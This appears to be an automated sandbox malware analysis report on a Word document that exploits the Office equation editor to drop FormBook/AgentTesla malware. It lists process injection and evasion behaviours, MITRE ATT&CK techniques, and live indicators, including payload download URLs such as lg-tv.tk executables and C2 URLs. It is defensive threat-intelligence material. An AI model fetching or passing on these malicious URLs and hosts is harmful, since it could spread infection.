      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\hasmenhtk721.exe'
      Source: explorer.exe, 00000006.00000000.460524294.0000000000750000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688441808.0000000000CF0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
      Source: explorer.exe, 00000006.00000000.460524294.0000000000750000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688441808.0000000000CF0000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: explorer.exe, 00000006.00000000.460524294.0000000000750000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688441808.0000000000CF0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeQueries volume information: C:\Users\user\AppData\Roaming\hasmenhtk721.exe VolumeInformation
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing12/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 491362 Sample: RFQ9003930 New Order.doc Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 50 Multi AV Scanner detection for domain / URL 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 17 other signatures 2->56 10 EQNEDT32.EXE 11 2->10         started        15 WINWORD.EXE 291 23 2->15         started        process3 dnsIp4 42 lg-tv.tk 185.239.243.112, 49165, 80 CLOUDIE-AS-APCloudieLimitedHK Moldova Republic of 10->42 32 C:\Users\user\AppData\...\hasmenhtk721.exe, PE32 10->32 dropped 34 C:\Users\user\AppData\...\harshmanzx[1].exe, PE32 10->34 dropped 74 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->74 17 hasmenhtk721.exe 1 5 10->17         started        file5 signatures6 process7 signatures8 44 Multi AV Scanner detection for dropped file 17->44 46 Tries to detect virtualization through RDTSC time measurements 17->46 48 Injects a PE file into a foreign processes 17->48 20 hasmenhtk721.exe 17->20         started        process9 signatures10 58 Modifies the context of a thread in another process (thread injection) 20->58 60 Maps a DLL or memory area into another process 20->60 62 Sample uses process hollowing technique 20->62 64 Queues an APC in another process (thread injection) 20->64 23 explorer.exe 20->23 injected process11 dnsIp12 36 alzayantourism.com 166.62.10.138, 49167, 80 AS-26496-GO-DADDY-COM-LLCUS United States 23->36 38 www.eastwestasia-thailand.com 23->38 40 3 other IPs or domains 23->40 66 System process connects to network (likely due to code injection or exploit) 23->66 27 rundll32.exe 23->27         started        signatures13 process14 signatures15 68 Modifies the context of a thread in another process (thread injection) 27->68 70 Maps a DLL or memory area into another process 27->70 72 Tries to detect virtualization through RDTSC time measurements 27->72 30 cmd.exe 27->30         started        process16

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      RFQ9003930 New Order.doc29%VirustotalBrowse
      RFQ9003930 New Order.doc29%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harshmanzx[1].exe29%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
      C:\Users\user\AppData\Roaming\hasmenhtk721.exe29%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      5.2.hasmenhtk721.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
      5.2.hasmenhtk721.exe.516810.2.unpack100%AviraTR/ATRAPS.GenDownload File
      5.2.hasmenhtk721.exe.30000.0.unpack100%AviraTR/ATRAPS.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      lg-tv.tk16%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      http://www.rspb.org.uk/wildlife/birdguide/name/0%Avira URL Cloudsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://www.mozilla.com00%URL Reputationsafe
      http://www.ceasa.club/hht8/?3f_l=DUjZaEEJGHk2mIYyRTWCDvfPYGXyJA+p9CnlV/1lDuzycvHeDg3jgt8DWF0RM29KScOphA==&e6-0=cZQH7dS0%Avira URL Cloudsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://www.alzayantourism.com/hht8/?3f_l=kMYE47A9Ipt2JQtPCSStI6O3jSMpHsULQE7+uza83sv6yxZmMge2O0x1IBVpwyYq5aFQXg==&e6-0=cZQH7dS0%Avira URL Cloudsafe
      http://java.sun.com0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      www.eastwestasia-thailand.com/hht8/0%Avira URL Cloudsafe
      http://lg-tv.tk/harshmanzx.exe100%Avira URL Cloudmalware
      http://computername/printers/printername/.printer0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      lg-tv.tk
      185.239.243.112
      truetrueunknown
      parkingpage.namecheap.com
      198.54.117.215
      truefalse
        high
        alzayantourism.com
        166.62.10.138
        truetrue
          unknown
          www.ceasa.club
          unknown
          unknowntrue
            unknown
            www.eastwestasia-thailand.com
            unknown
            unknowntrue
              unknown
              www.alzayantourism.com
              unknown
              unknowntrue
                unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.ceasa.club/hht8/?3f_l=DUjZaEEJGHk2mIYyRTWCDvfPYGXyJA+p9CnlV/1lDuzycvHeDg3jgt8DWF0RM29KScOphA==&e6-0=cZQH7dStrue
                • Avira URL Cloud: safe
                unknown
                http://www.alzayantourism.com/hht8/?3f_l=kMYE47A9Ipt2JQtPCSStI6O3jSMpHsULQE7+uza83sv6yxZmMge2O0x1IBVpwyYq5aFQXg==&e6-0=cZQH7dStrue
                • Avira URL Cloud: safe
                unknown
                www.eastwestasia-thailand.com/hht8/true
                • Avira URL Cloud: safe
                low
                http://lg-tv.tk/harshmanzx.exetrue
                • Avira URL Cloud: malware
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.windows.com/pctv.rundll32.exe, 00000007.00000002.687912548.0000000000720000.00000002.00020000.sdmpfalse
                  high
                  http://investor.msn.comexplorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmpfalse
                    high
                    http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmpfalse
                      high
                      http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.rspb.org.uk/wildlife/birdguide/name/hasmenhtk721.exe, hasmenhtk721.exe, 00000005.00000002.477585914.0000000000BB2000.00000020.00020000.sdmp, rundll32.exe, 00000007.00000002.689308196.000000000297F000.00000004.00020000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.524604112.0000000004513000.00000004.00000001.sdmpfalse
                        high
                        http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000006.00000000.465258321.00000000045D4000.00000004.00000001.sdmpfalse
                          high
                          http://www.mozilla.com0explorer.exe, 00000006.00000000.526196234.0000000006998000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.msn.com/?ocid=iehpPexplorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmpfalse
                            high
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmpfalse
                              high
                              http://treyresearch.netexplorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.456117807.00000000044E7000.00000004.00000001.sdmpfalse
                                high
                                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmpfalse
                                  high
                                  http://www.msn.com/?ocid=iehpp7P&explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmpfalse
                                    high
                                    http://java.sun.comexplorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.521205855.0000000001BE0000.00000002.00020000.sdmpfalse
                                      high
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmpfalse
                                        high
                                        http://investor.msn.com/explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmpfalse
                                          high
                                          http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmpfalse
                                              high
                                              http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://www.%s.comPAexplorer.exe, 00000006.00000000.521205855.0000000001BE0000.00000002.00020000.sdmpfalse
                                              • URL Reputation: safe
                                              low
                                              http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmpfalse
                                                high
                                                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1enuexplorer.exe, 00000006.00000000.468389644.000000000840D000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://support.mozilla.orgexplorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmpfalse
                                                    high
                                                    http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.463735774.0000000003E50000.00000002.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    low

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    166.62.10.138
                                                    alzayantourism.comUnited States
                                                    26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                    185.239.243.112
                                                    lg-tv.tkMoldova Republic of
                                                    55933CLOUDIE-AS-APCloudieLimitedHKtrue
                                                    198.54.117.215
                                                    parkingpage.namecheap.comUnited States
                                                    22612NAMECHEAP-NETUSfalse

                                                    General Information

                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                    Analysis ID:491362
                                                    Start date:27.09.2021
                                                    Start time:14:09:57
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 13m 6s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:RFQ9003930 New Order.doc
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:10
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.expl.evad.winDOC@9/8@4/3
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 8.5% (good quality ratio 8.1%)
                                                    • Quality average: 72.8%
                                                    • Quality standard deviation: 27.6%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .doc
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    14:10:25API Interceptor48x Sleep call for process: EQNEDT32.EXE modified
                                                    14:10:27API Interceptor81x Sleep call for process: hasmenhtk721.exe modified
                                                    14:10:52API Interceptor155x Sleep call for process: rundll32.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    185.239.243.112WELDED PIPES - Bid No 2000543592- PR.docGet hashmaliciousBrowse
                                                    • xleetaz.xyz/prison/sam.exe
                                                    AWB.docGet hashmaliciousBrowse
                                                    • fantecheo.tk/famzlogszx.exe
                                                    New Order.docGet hashmaliciousBrowse
                                                    • lg-tv.tk/bulizx.exe
                                                    DO526.docGet hashmaliciousBrowse
                                                    • fantecheo.tk/famzlogszx.exe
                                                    24-09-2021 LETTER OF INTENT.docGet hashmaliciousBrowse
                                                    • lg-tv.tk/bankzx.exe
                                                    DHL#AWB#29721.docGet hashmaliciousBrowse
                                                    • fantecheo.tk/princezx.exe
                                                    PO2021.docGet hashmaliciousBrowse
                                                    • fantecheo.tk/ibefrankzx.exe
                                                    PON507991 Copy.docGet hashmaliciousBrowse
                                                    • lg-tv.tk/bryantzx.exe
                                                    OUTSTANDING PAYMENT.docGet hashmaliciousBrowse
                                                    • xleetaz.xyz/benx/nd.exe
                                                    New Order.docGet hashmaliciousBrowse
                                                    • xleetaz.xyz/benx/bd.exe
                                                    Proforma Invoice 28093.docGet hashmaliciousBrowse
                                                    • xleetaz.xyz/benx/sy.exe
                                                    BL UALBHHOU1.docGet hashmaliciousBrowse
                                                    • xleetaz.xyz/benx/mb.exe
                                                    Pedido 20839.docGet hashmaliciousBrowse
                                                    • fantecheo.tk/chungzx.exe
                                                    catalogue.docGet hashmaliciousBrowse
                                                    • lg-tv.tk/shakitizx.exe
                                                    SWIFT.docGet hashmaliciousBrowse
                                                    • lg-tv.tk/obizx.exe
                                                    TU22.docGet hashmaliciousBrowse
                                                    • fantecheo.tk/famzlogszx.exe
                                                    AVB CMAU6526450 40HC COI2100105.docGet hashmaliciousBrowse
                                                    • lg-tv.tk/bluezx.exe
                                                    Paid Invoices.docGet hashmaliciousBrowse
                                                    • lg-tv.tk/atlaszx.exe
                                                    Abn order 55.docGet hashmaliciousBrowse
                                                    • lg-tv.tk/bankzx.exe
                                                    Purchase Order.docGet hashmaliciousBrowse
                                                    • xleetaz.xyz/stockers/valman.exe

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    lg-tv.tkNew Order.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    24-09-2021 LETTER OF INTENT.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    PON507991 Copy.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    catalogue.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    SWIFT.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    AVB CMAU6526450 40HC COI2100105.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Paid Invoices.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Abn order 55.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    RFQ.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    DHL BL2021764774AWB.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    sept quotation.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    invoice-E-2-S-2122-1235.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Purchase Order PO81-36A2DC.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    New ORDER.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Mahem Order.doc__.rtfGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    New Order.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    BL and permit.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    KOC-Order.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    REQ_Scan001_No- 9300340731.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Po.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    parkingpage.namecheap.comPURCHASE ORDER I 5083.exeGet hashmaliciousBrowse
                                                    • 198.54.117.218
                                                    RgproFrlyA.exeGet hashmaliciousBrowse
                                                    • 198.54.117.218
                                                    INVOICE.exeGet hashmaliciousBrowse
                                                    • 198.54.117.211
                                                    NEW ORDER RE PO88224.PDF.EXEGet hashmaliciousBrowse
                                                    • 198.54.117.212
                                                    doc0490192021092110294.exeGet hashmaliciousBrowse
                                                    • 198.54.117.211
                                                    SWIFT Transfer 103_0034OTT21000123_8238174530.PDF.exeGet hashmaliciousBrowse
                                                    • 198.54.117.210
                                                    SYsObQNkC1.exeGet hashmaliciousBrowse
                                                    • 198.54.117.216
                                                    SBGW#001232021.exeGet hashmaliciousBrowse
                                                    • 198.54.117.217
                                                    DHL_Sender_Documents_Details_021230900.xlsxGet hashmaliciousBrowse
                                                    • 198.54.117.215
                                                    invoice.exeGet hashmaliciousBrowse
                                                    • 198.54.117.210
                                                    onxyPs4yG1MUPbN.exeGet hashmaliciousBrowse
                                                    • 198.54.117.211
                                                    85fX3YfW9S.exeGet hashmaliciousBrowse
                                                    • 198.54.117.215
                                                    Amended SO of 2000KVA400KVA.exeGet hashmaliciousBrowse
                                                    • 198.54.117.210
                                                    Updated SOA 210920.PDF.exeGet hashmaliciousBrowse
                                                    • 198.54.117.217
                                                    Z14S9Zolcyub1pd.exeGet hashmaliciousBrowse
                                                    • 198.54.117.210
                                                    sprogr.exeGet hashmaliciousBrowse
                                                    • 198.54.117.215
                                                    EWVNnyXoRS.exeGet hashmaliciousBrowse
                                                    • 198.54.117.212
                                                    aT8aer3ybNvYpl3.exeGet hashmaliciousBrowse
                                                    • 198.54.117.215
                                                    VUcg8XrQYa.exeGet hashmaliciousBrowse
                                                    • 198.54.117.216
                                                    Shq9ms6iU1.exeGet hashmaliciousBrowse
                                                    • 198.54.117.211

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    AS-26496-GO-DADDY-COM-LLCUSMOQ-Request_0927210-006452.xlsxGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    DHL EXPRESS TESL#U0130MAT B#U0130LD#U0130R#U0130M#U0130 - AWB 9420174470.PDF.exeGet hashmaliciousBrowse
                                                    • 148.72.246.52
                                                    fmS6YYhBy1Get hashmaliciousBrowse
                                                    • 148.72.252.161
                                                    L3Gl0GugHoGet hashmaliciousBrowse
                                                    • 208.109.110.202
                                                    test1.dllGet hashmaliciousBrowse
                                                    • 148.66.136.190
                                                    qkF3PCHVXs.xlsGet hashmaliciousBrowse
                                                    • 148.72.53.144
                                                    qkF3PCHVXs.xlsGet hashmaliciousBrowse
                                                    • 148.72.53.144
                                                    NS. ORDINE N. 141.exeGet hashmaliciousBrowse
                                                    • 107.180.56.180
                                                    cash payment.exeGet hashmaliciousBrowse
                                                    • 107.180.56.180
                                                    Swift_6408372.exeGet hashmaliciousBrowse
                                                    • 107.180.56.180
                                                    RFQ-847393.exeGet hashmaliciousBrowse
                                                    • 107.180.56.180
                                                    IX-08955.exeGet hashmaliciousBrowse
                                                    • 166.62.10.136
                                                    jKira.arm7Get hashmaliciousBrowse
                                                    • 68.178.219.153
                                                    HSBC94302,pdf.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    MOIUQ4354.vbsGet hashmaliciousBrowse
                                                    • 107.180.72.43
                                                    JIQKI7073.vbsGet hashmaliciousBrowse
                                                    • 107.180.72.43
                                                    Quotation -Scan001_No- 9300340731.doc.exeGet hashmaliciousBrowse
                                                    • 107.180.56.180
                                                    test.dllGet hashmaliciousBrowse
                                                    • 166.62.10.48
                                                    DUE PAYMENT.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    proforma invoice 098756.exeGet hashmaliciousBrowse
                                                    • 107.180.56.180
                                                    CLOUDIE-AS-APCloudieLimitedHKWELDED PIPES - Bid No 2000543592- PR.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    AWB.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    New Order.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    DO526.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    24-09-2021 LETTER OF INTENT.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    IKpep4Zn5S.exeGet hashmaliciousBrowse
                                                    • 45.119.53.93
                                                    DHL#AWB#29721.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    PO2021.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    PON507991 Copy.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    OUTSTANDING PAYMENT.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    New Order.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Proforma Invoice 28093.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    BL UALBHHOU1.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Pedido 20839.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    eJRGpI4A6d.exeGet hashmaliciousBrowse
                                                    • 45.119.53.93
                                                    catalogue.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    SWIFT.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    TU22.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    AVB CMAU6526450 40HC COI2100105.docGet hashmaliciousBrowse
                                                    • 185.239.243.112
                                                    Paid Invoices.docGet hashmaliciousBrowse
                                                    • 185.239.243.112

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harshmanzx[1].exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
